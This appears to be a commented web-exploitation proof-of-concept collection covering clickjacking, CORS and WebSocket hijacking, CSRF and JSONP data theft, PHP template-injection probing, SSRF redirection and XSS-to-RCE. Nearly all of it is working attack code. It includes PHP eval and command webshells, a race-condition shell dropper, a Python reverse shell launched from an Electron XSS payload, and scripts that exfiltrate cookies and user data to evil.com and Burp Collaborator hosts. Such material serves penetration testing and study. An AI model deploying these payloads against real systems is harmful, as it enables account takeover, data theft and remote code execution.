pocs
# refer https://cloud.tencent.com/developer/article/1692434
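<head>
<style>
/* Keep the framed target page almost invisible on top of the lure.
   0.05 is the decimal form of the original 5%: percentage values for
   `opacity` are only understood by browsers implementing CSS Color 4,
   the decimal form works everywhere. */
iframe#fgframe{
opacity: 0.05;
}
</style>
</head>
<!-- Clickjacking-style self-exfiltration lure: the victim is told to click
     into the (near-invisible) frame, select all, copy, and paste the
     "mystery code" - presumably the servlet's cookie dump - into the
     textarea, which then POSTs it to the Burp Collaborator host.
     Precondition: the framed site must not send X-Frame-Options or a
     frame-ancestors CSP that forbids framing. -->
<h1>幸运抽奖</h1>
<h2>步骤<br>
复制下框文字(点击,ctrl+a -> ctrl+c -> ctrl+v)
</h2>
<iframe id="fgframe" height="650px" width="400px" src="https://domain/examples/servlets/servlet/CookieExample"></iframe>
<form action="http://znqaymzephedmfymwg9rma5ef5lv9k.burpcollaborator.net" method="POST">
<div>
<label for="say">在此处粘贴神秘代码</label>
<textarea id="cookie" name="cookie" rows="4" cols="50"></textarea>
<button>点我赢千元奖金</button>
</div>
</form>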
# GET Method
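<script type="text/javascript">
// CORS probe (GET): the request carries the victim's cookies (withCredentials)
// and the body is readable only if the target answers with
// Access-Control-Allow-Origin for this origin plus
// Access-Control-Allow-Credentials: true.
// The target URL must be absolute: the original "victim.com/getUserInfo" is a
// relative path, so the browser resolved it against the attacker page and the
// request never left this origin.
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open("get", "https://victim.com/getUserInfo", true);
req.withCredentials = true;
req.send();
function reqListener(){ alert(req.responseText); }
</script>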
# POST Method
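<script type="text/javascript">
// CORS probe (POST): same as the GET variant but with a form-encoded body.
// application/x-www-form-urlencoded is CORS-safelisted, so no preflight is
// sent; the response is readable only if the target reflects this origin in
// Access-Control-Allow-Origin together with Access-Control-Allow-Credentials.
// The target URL must be absolute (a bare "victim.com/..." is resolved
// relative to the attacker page).
var data = "id=123";
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open("post", "https://victim.com/getUserInfo", true);
req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
req.withCredentials = true;
req.send(data);
function reqListener(){ alert(req.responseText); }
</script>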
# refer https://gh0st.cn//archives/2019-03-20/1
<meta charset="utf-8">
<script>
// Cross-site WebSocket hijacking skeleton: the victim's browser opens a socket
// to the target carrying its own cookies. This only pays off when the server
// authenticates the handshake by cookie and does not validate the Origin header.
function ws_attack(){// user-defined function ws_attack
// function body
// create the WebSocket and keep it in `ws`
var ws = new WebSocket("ws://域名:端口/");// use "ws://" when the WebSocket service is plain HTTP, "wss://" when it is served over HTTPS (the literal is a hostname:port placeholder)
ws.onopen = function(evt) {
// runs once the connection is open
ws.send("我是帅key的可爱小迷弟!");
};
ws.onmessage = function(evt) {
// runs when the server sends a message; the payload is in evt.data, e.g. alert(evt.data)
// (this skeleton discards the data and just closes the socket)
ws.close();
};
}
ws_attack();// run ws_attack
</script>
# refer https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking/lab
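<script>
// Cross-site WebSocket hijacking (PortSwigger lab): the victim's browser opens
// the chat socket with its session cookie; every server message is beaconed
// to the collaborator host with a no-cors GET (response not needed).
function ws_attack(){
var ws = new WebSocket("wss://xyz.web-security-academy.net/chat");
ws.onopen = function(evt) { ws.send("READY"); };
ws.onmessage = function(evt) {
// Encode the message: a raw '#', '&' or '+' in evt.data would truncate or
// mangle the query string on the receiving side.
fetch('https://xyz.burpcollaborator.net/?' + encodeURIComponent(evt.data), {mode:'no-cors'});
};
}
ws_attack();
</script>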
# refer https://hackerone.com/reports/95089
<html>
<body>
<script>
// CSRF PoC (HackerOne #95089): adds product id 976094353 to the victim's cart
// with a multipart POST that carries their cookies. The first field's *name*
// embeds an <img onmouseover> payload inside properties[...], i.e. the request
// also plants an XSS payload in the line-item property name.
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://hardware.shopify.com/cart/add", true);
// Accept, Accept-Language and a multipart/form-data Content-Type are all
// CORS-safelisted, so the browser sends this as a plain cross-site POST with
// no preflight.
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------13411895127118");
xhr.withCredentials = true; // attach the shopper's session cookies
// Hand-built multipart body; each part delimiter is "--" + the boundary above.
var body = "-----------------------------13411895127118\r\n" +
"Content-Disposition: form-data; name=\"properties[Artwork file\x3cimg src=\'test\' onmouseover=\'alert(2)\'\x3e]\"; filename=\"test.png\"\r\n" +
"Content-Type: image/png\r\n" +
"\r\n" +
"\x89PNG\r\n" +
"-----------------------------13411895127118\r\n" +
"Content-Disposition: form-data; name=\"properties[Custom text line 1]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------13411895127118\r\n" +
"Content-Disposition: form-data; name=\"properties[Custom text line 2]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------13411895127118\r\n" +
"Content-Disposition: form-data; name=\"properties[Custom text line 3]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------13411895127118\r\n" +
"Content-Disposition: form-data; name=\"production-time\"\r\n" +
"\r\n" +
"standard\r\n" +
"-----------------------------13411895127118\r\n" +
"Content-Disposition: form-data; name=\"id\"\r\n" +
"\r\n" +
"976094353\r\n" +
"-----------------------------13411895127118--\r\n";
// Copy the string into raw bytes one char code at a time so the 0x89 of the
// PNG magic is sent as a single byte instead of being UTF-8 encoded.
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
#1
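<html>
<head>
<script type="text/javascript">
// CSRF PoC: set the victim's password through a JSON POST that carries their
// cookies. application/json is NOT a CORS-safelisted Content-Type, so the
// browser first sends an OPTIONS preflight and only delivers the POST if the
// target's CORS policy allows this origin with credentials - that is a
// precondition of this PoC, not something the script can force.
// (The original tag used `style="text/javascript"`; the attribute is `type`.)
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://openapi.rajax-inc.com/business/alsc-uni/setPassword", true);
xhr.setRequestHeader("Accept", "application/json, text/plain, */*");
xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3");
xhr.setRequestHeader("Content-Type", "application/json; charset=utf-8");
xhr.withCredentials = true; // send the victim's session cookies
xhr.send(JSON.stringify({"checkType":100,"password":"pp1234","passwordConfirm":"pp1234"}));
}
</script>
</head>
<body>
<form action="#">
<input type="button" value="Submit request" onClick="submitRequest()"/>
</form>
</body>
</html>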
#2
<html>
<title>CSRF Exploit POC by RootSploit</title>
<body>
<center>
<h1> CSRF Exploit POC by RootSploit</h1>
<script>
// JSON-body CSRF: creates a new full-access user with the victim's cookies
// (credentials: 'include'). Because the Content-Type is application/json the
// browser issues an OPTIONS preflight first, so the POST only reaches the
// server when the target's CORS policy permits this origin with credentials.
// NOTE(review): the "[email protected]" address looks like an e-mail
// obfuscation artefact of the page scrape; the original value is not
// recoverable from this copy.
function JSON_CSRF() {
var target = 'https://vuln.rootsploit.io/v1/addusers';
var payload = '{"user":{"role_id":"full_access","first_name":"RootSploit","last_name":"RootSploit","email":"[email protected]","password":"Password@","confirm_password":"Password@","mobile_number":"99999999999"}}';
var options = {
method: 'POST',
credentials: 'include',
headers: {'Content-Type': 'application/json'},
body: payload
};
fetch(target, options);
}
</script>
<button onclick="JSON_CSRF()">Exploit CSRF</button>
</center>
</body>
</html>
#3 refer https://mp.weixin.qq.com/s?__biz=MzI5MDU1NDk2MA==&mid=2247493991&idx=1&sn=37d340a42e0ab13599298e511789300f
# flash + HTTP 307
csrf.as
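package {
import flash.display.Sprite;
import flash.net.URLLoader;
import flash.net.URLRequest;
import flash.net.URLRequestHeader;
import flash.net.URLRequestMethod;
// Flash + HTTP 307 CSRF (technique from the referenced write-up): Flash can
// POST a JSON body with a custom Content-Type to the attacker's own host;
// csrf307.php answers 307, and the client replays method, headers and body
// to the victim endpoint, now carrying the victim's cookies for that domain.
// The `description` value doubles as a stored-XSS probe (breaks out of a
// <textarea>).
public class csrf extends Sprite {
public function csrf() {
super();
// Profile fields to write; the original built this via a dead
// `new Object()` that was immediately overwritten, and stringified
// the payload twice - both dropped.
var member1:Object = {
"gender":"2",
"homeCity":"4170",
"nowCity":"4170",
"profession":"23",
"description":"</textarea><script>alert(document.cookie)</script><textarea>",
"signature":""
};
var myJson:String = JSON.stringify(member1);
var url:String = "http://<attacker-ip>/csrf307.php";
var request:URLRequest = new URLRequest(url);
request.requestHeaders.push(new URLRequestHeader("Content-Type","application/json"));
request.data = myJson;
request.method = URLRequestMethod.POST;
var urlLoader:URLLoader = new URLLoader();
try {
urlLoader.load(request);
} catch(e:Error) {
// load() throws synchronously on e.g. a malformed URL or sandbox denial
trace(e);
}
}
}
}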
# csrf307.php
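<?php
// 307 Temporary Redirect keeps the request method and body when the client
// follows it, so a POST (with its JSON body and Content-Type) landing here is
// replayed against the victim endpoint - with whatever cookies the client
// holds for that domain.
header("Location: https://victim/csrf/endpoints", true, 307);
// Stop here: nothing after a redirect header should be emitted or executed.
exit;
?>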
#1
<!-- JSONP hijack: define the callback first, then load the endpoint as a script.
     The response `jsonp({...})` executes in this page with the victim's cookies
     attached to the script request. alert(a) shows "[object Object]" for an
     object; use JSON.stringify(a) to inspect the data. -->
<script>function jsonp(a){alert(a);}</script>
<script src="http://victim/getUserInfo?callback=jsonp"></script>
#2
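<!-- JSONP data theft: the callback receives the parsed response and beacons it
     to the attacker host via an image request (very long responses may hit
     URL length limits; split or POST them in that case). -->
<script>
function test(data){
// JSONP endpoints hand the callback a parsed object (see o.userinfo / o.items
// in the other snippets); escape(obj) would only ship "[object Object]", so
// serialise first. encodeURIComponent instead of escape(): escape() leaves
// '+' raw (decoded as a space by the receiver) and emits %uXXXX for
// non-Latin-1 text, which the receiver cannot urldecode.
var text = typeof data === 'string' ? data : JSON.stringify(data);
new Image().src = '//evil/a.php?b=' + encodeURIComponent(text);
}
</script>
<script src='http://victim/getUserInfo?callback=test'></script>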
#3 jquery lib
<script src="http://cdn.static.runoob.com/libs/jquery/1.8.3/jquery.js"></script>
<!-- jQuery JSONP: the "jsoncallback=?" placeholder makes $.getJSON generate a
     callback name and load the URL as a <script>, so the endpoint must accept
     an arbitrary callback name in that parameter. alert(a) on an object shows
     "[object Object]"; use JSON.stringify(a) to see the data. -->
<script type="text/javascript">$.getJSON("http://example.com/getUser.php?jsoncallback=?",function(a){alert(a);});
</script>
#4 no Referer header (script request issued from a javascript: iframe), refer https://blog.knownsec.com/2015/03/jsonp_security_technic/
<!-- Same hijack from a javascript: iframe. The frame's document has no URL of
     its own, which the referenced write-up uses to issue the script request
     without a Referer header and bypass Referer-based JSONP allow-lists;
     verify in current browsers, which may fall back to the creator document's
     referrer. Naming the callback JSON shadows the built-in JSON object inside
     the frame (harmless here). `calback=` is kept as in the original -
     presumably the endpoint's real parameter name, otherwise a typo for
     `callback`. -->
<iframe src="javascript:'<script>function JSON(o){alert(o.userinfo.userid);}</script><script src=http://example/login.php?calback=JSON></script>'"></iframe>
#5 weak token bruteforce, refer https://blog.knownsec.com/2015/03/jsonp_security_technic/
// Weak-token brute force: `g_tk` is a small integer, so iterate candidate
// values and let the JSONP callback fire for the one the server accepts.
// The bounds here (17008..17008) are a placeholder covering a single value;
// `i` is left as an implicit global exactly as in the original.
function _Callback(o){alert(o.items[0].uin);}
// NOTE(review): getJSON is not defined in this snippet - presumably a helper
// from the referenced post that injects a <script> tag (or jQuery's
// $.getJSON); the endpoint must call _Callback by that fixed name.
for(i=17008;i<17009;i++){
getJSON("http://example/cgi-bin/tfriend/friend_show_qqfriends.cgi?uin=1111111&g_tk="+i);
}
#!/usr/local/bin/python3
from argparse import ArgumentParser
from requests import get, post
from requests.exceptions import RequestException
from urllib3 import disable_warnings
disable_warnings()
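def poc(url, timeout=10):
    """Probe ``url`` for template injection via a ``${@phpinfo()}`` path segment.

    Sends a JSON POST to ``<url>/index.php/module/aciton/param1/${@phpinfo()}``
    and reports the target as vulnerable when the phpinfo() page title shows up
    in the response body.

    Args:
        url: base URL including the scheme, without a trailing slash.
        timeout: seconds to wait for the target before giving up. The original
            sent the request without a timeout and could hang on a silent host.

    Returns:
        True when the marker was found in the response, False otherwise
        (including when the request itself failed).
    """
    # NOTE(review): 'aciton' is kept as in the original payload; confirm against
    # the referenced write-up before "fixing" the spelling.
    payload = '/index.php/module/aciton/param1/${@phpinfo()}'
    regex = '<title>phpinfo()</title>'
    target = '{}{}'.format(url, payload)
    header = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0'
    }
    data = {
        'key': 'value'
    }
    try:
        # verify=False is deliberate for scanning self-signed targets.
        # resp = get(target, headers=header, data=data, verify=False, timeout=timeout)
        # resp = post(target, headers=header, data=data, verify=False, timeout=timeout)
        resp = post(target, headers=header, json=data, verify=False, timeout=timeout)
    except RequestException as exc:
        # Connection refused / timeout / TLS failure: report, do not crash.
        print('{} request failed: {}'.format(url, exc))
        return False
    # The original tested `regex in resp.text and resp.status_code`; the status
    # code is never 0, so the body marker is the only thing that matters.
    match = regex in resp.text
    if match:
        print('{} is vulnerable'.format(url))
    else:
        print('{} is not vulnerable'.format(url))
    return match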
if __name__ == '__main__':
    # CLI entry point: -u/--url must carry a scheme, otherwise print usage.
    cli = ArgumentParser()
    cli.add_argument('-u', '--url', type=str, required=True,
                     help='target URL with protocol')
    opts = cli.parse_args()
    target = opts.url
    if not target.startswith('http'):
        cli.print_help()
    else:
        poc(target.rstrip('/'))
<%-- Minimal JSP execution probes: if the uploaded file prints "a", the server
     compiled and ran it as JSP. Two equivalent spellings in case one tag form
     is filtered. --%>
<%out.print("a");%>
<jsp:scriptlet>out.print("a");</jsp:scriptlet>
<?php /* minimal PHP execution probe: prints "a" if the file is run as PHP */ echo "a";?>
GIF89a
<?php /* "GIF89a" above = image magic bytes, presumably to pass content-type
sniffing on upload. The backtick operator is shell_exec(): ?1=<cmd> runs the
command and its output is echoed, e.g. the URL on the next line runs `id`. */ $a = `$_GET[1]`; echo $a;?>
// http://foo.bar/1.php?1=id
// race condition
<?php
// Race-condition upload payload: presumably the server stores the upload
// first and validates/removes it afterwards, so one request to this file
// during that window drops a persistent eval() shell (POST parameter "key")
// next to it. The path is relative to the PHP process's working directory.
$filename = "asdfghjkl.php";
$shell = '<?php eval($_POST["key"]);?>';
file_put_contents($filename, $shell);
?>
<?php /* one-line eval webshell: the POST parameter "pass" is executed as PHP; "@" suppresses warnings */ @eval($_POST['pass'])?>
<script language=php>/* alternative PHP opening tag, useful where "<?php" is filtered; removed in PHP 7.0 so only PHP 5.x targets run this */phpinfo();</script>
# reference https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530
# reference https://pastebin.com/raw/ywAUhFrv
#!/usr/bin/env python3
import sys
from http.server import HTTPServer, BaseHTTPRequestHandler
# Usage guard: exactly two positional arguments (listen port, redirect
# target); otherwise print the usage text and quit.
if len(sys.argv)-1 != 2:
    print("""
Usage: {} <port_number> <url>
""".format(sys.argv[0]))
    sys.exit()
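class Redirect(BaseHTTPRequestHandler):
    """Answer every request with a 302 to the URL given on the command line.

    Used to bounce a server-side fetch (blind SSRF) onto a target the victim
    would not request directly; the referenced write-ups redirect to a
    gopher:// URL, but any Location value the fetching client follows will do.
    """

    def _redirect(self):
        # Plain 302 with the CLI-supplied Location and nothing else.
        self.send_response(302)
        self.send_header('Location', sys.argv[2])
        self.end_headers()

    def do_GET(self):
        self._redirect()

    def send_error(self, code, message=None, explain=None):
        # Redirect even where the base class would emit an error page (unknown
        # method, malformed request) so any method gets bounced. Python's own
        # parser calls send_error with a third `explain` argument on over-long
        # header lines, so the override must accept it or the handler dies
        # with a TypeError.
        self._redirect()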
# Bind all interfaces on the given port and serve until killed.
HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
# refer https://www.t00ls.com/thread-65907-1-1.html
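<script>
// CSRF via fetch against an `.action` endpoint: resets user 8057's password.
// credentials: 'include' is required - fetch defaults to 'same-origin', so the
// original cross-site request went out WITHOUT the victim's cookies and could
// not have hit an authenticated endpoint. The form-encoded Content-Type is
// CORS-safelisted, so no preflight is issued.
fetch('http://webapp/workUser.action', {
method: 'post',
credentials: 'include',
body: 'vo.nickName=admin1&vo.id=8057&vo.password=123456&confirmPwd=123456',
headers: {'Content-Type': 'application/x-www-form-urlencoded'}
});
</script>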
// refer https://mp.weixin.qq.com/s?__biz=MzIxNDAyNjQwNg==&mid=2456098521&idx=1&sn=3d1b6e3e79a653c9e3367a6ee64a3a78
// XSS payload
// <img src="x" onerror=import(unescape('http%3A//127.0.0.1/test2.js'))>
// test2.js
// Loaded by the XSS payload above via import(); presumably runs in a renderer
// with Node integration enabled (Electron-style), where `require` is
// available to page script and child_process gives host code execution.
(function(){
// Visible proof on macOS: open the Calculator.
require('child_process').exec('open /System/Applications/Calculator.app');
// Python reverse shell to 127.0.0.1:9999 - replace with the listener's address.
require('child_process').exec('python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'');
})();
# refer https://gh0st.cn//archives/2020-01-08/3
<script>
// Hijack webpack's JSONP chunk loader: the victim's bundle calls
// webpackJsonp(chunkIds, modules) when it loads, so defining that global first
// hands this page the chunk's second argument (presumably its module map);
// the `jbTV` entry is shown as a demo. Works only for bundles that call the
// function directly rather than push() onto an array.
window.webpackJsonp = function (chunkIds, modules) {
alert(modules.jbTV);
};
</script>
<script src="https://victim/app.xxxxx.js"></script>
#2 refer https://mp.weixin.qq.com/s?__biz=Mzg2NDU3Mzc5OA==&mid=2247486013&idx=1&sn=c8e1e001c767f77af0c1554f9eb1e2cb&source=41#wechat_redirect
<!-- Sensitive data leak via a cross-origin script: if 1.js assigns its payload
     to a global (window.data), any page that includes it can read the value.
     This fragment assumes jQuery is already loaded and a #leaked_content
     element exists - neither is shown here. -->
<script type="text/javascript" src="http://victim.com/leaked/1.js"></script>
<script type="text/javascript">$('#leaked_content').text(window.data);</script>
#1 - XSS Insert `<script src='//evil.com/1.js'></script>`
#2 - 1.js:
// Build an XHR that carries the victim's cookies on cross-origin requests
// (withCredentials); falls back to the legacy ActiveX object on old IE.
function get_xhr(){
var xhr = window.XMLHttpRequest
? new XMLHttpRequest()
: new ActiveXObject("Microsoft.XMLHTTP");
xhr.withCredentials = true; // send the Cookie header cross-origin
return xhr;
}
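// Cross-site tracing: send a TRACE to `url` with the victim's cookies and ship
// the echoed request (which contains the Cookie header) to evil.com.
// NOTE(review): current browsers refuse TRACE from XMLHttpRequest (it is a
// forbidden method in the Fetch standard), so this only works in legacy
// engines; kept for reference.
function ajax(url) {
var xhr = get_xhr();
xhr.onreadystatechange = function () {
if (xhr.readyState != 4) {
return; // still in flight
}
if (xhr.status == 200) {
var resp = xhr.responseText;
// encodeURIComponent rather than escape(): escape() leaves '+' raw
// (decoded as a space by receive.php) and emits %uXXXX for non-Latin-1
// text, which the receiver cannot urldecode.
var url2 = "http://evil.com/receive.php?text=" + encodeURIComponent(resp);
var xhr2 = get_xhr();
xhr2.open("GET", url2, true);
xhr2.send();
}
};
xhr.open("TRACE", url, true); // async
xhr.send();
}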
// Target whose TRACE echo (and therefore Cookie header) we want.
var url = "http://victim.com/";
ajax(url);